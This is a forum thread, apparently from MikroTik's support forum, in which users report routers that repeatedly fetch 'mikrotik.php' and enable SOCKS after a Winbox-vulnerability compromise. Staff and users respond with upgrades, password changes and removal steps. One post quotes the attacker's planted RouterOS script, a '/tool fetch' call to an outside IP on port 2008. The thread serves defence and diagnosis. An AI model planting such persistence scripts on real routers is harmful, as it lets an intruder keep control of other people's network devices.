fetch:file “mikrotik.php” automatically downloading in Mikrotik devices

prekshapatel · July 24, 2018, 10:57am

We are observing some fetch:file “mikrotik.php” automatically downloaded in all type of devices i.e. SXT lite, RB 750 UP, RB 2011UIAS groove etc.
We see script added to mikrotik again and again, even after upgrading to latest version.

normis · July 24, 2018, 11:06am

upgrade device to 6.40.8 or 6.42.6 and change your password. also improve your network security according to these guides:
https://blog.mikrotik.com

prekshapatel · July 24, 2018, 11:46am

Socks is also getting enabled automatically in the devices where this file is getting downloaded. Kindly suggest why this is happening?

normis · July 24, 2018, 11:53am

Please read above post.

crashpunk · July 24, 2018, 2:33pm

Normis … I’m Being Attacked by This Vulnerability, 17 Hours ago the Attack Began, 07/23/2018 16:00 GMT-3. I have Installed RouterOS v6.41.3 and the www service disabled but they have still entered and installed a script.
I think they injected the script from another service, I’m not sure. But I Can See the Hour.-
I’m running backup and updating to the latest version but I think the vulnerability is still there, I’m going to deactivate all external services except Winbox for the moment and change password.
Screenshot:

mrz · July 24, 2018, 2:34pm

Upgrade to version that is not vulnerable. See details here:
https://blog.mikrotik.com/security/winbox-vulnerability.html

msatter · July 24, 2018, 4:38pm

How can that happen? I missed totally missed the announcement of the blog by Mikrotik.

Jessieblueyu · July 24, 2018, 8:11pm

I see the same behavior in my RB951G-2HnD - log shows that mikrotik.php was downloaded (I see it in the files section - it is blank php file) followed by a lot of telnet login attempts.

I upgraded to the latest version, changed the telnet and ssh ports.

Results:
No more telnet login attempts present in log.
Downloading of the mikrotik.php file continues (!!!)

What is happening here? How do I stop this?

Jessieblueyu · July 24, 2018, 8:20pm

I closed the WinBox access from WAN but the downloading of the mikrotik.php continues every 30 seconds exactly.

Any ideas?

Jessieblueyu · July 24, 2018, 8:30pm

OK I understood now what “they” did:

Somehow they managed to set up a script (created by my user!?) with the following content:

/tool fetch address=95.154.216.165 port=2008 src-path=/mikrotik.php mode=http
Apart from fetching this empty .php file I don’t see any other actions anywhere else.

After I removed the script, silent times came back… but this was disturbing…

crashpunk · July 24, 2018, 8:36pm

Thank You mrz, Fixed Problem.
I read in the Blog about the Attack on the Web Service. I did not see that the same problem was presented at port 8291 of WinBox.

TomosRider · July 25, 2018, 2:01pm

Hello guys!
I noticed this problem today. Found malicious script under system/scripts.Remove it.
Upgrade ROS did’nt helped.
Change your passwords, block port 2008, turn off ip/socks!!!

crashpunk · July 25, 2018, 8:22pm

TomosRider could inject the script after updating RouterOS v6.42.6 ..?

normis · July 26, 2018, 4:53am

Everyone, the issue is that somebody could have gotten your password a long time ago, through the winbox vulnerability published a few months ago. Even if you have upgraded, they still have your password, they just used it now. So upgrade fixes the vulnerability, but you have to change your password after upgrading.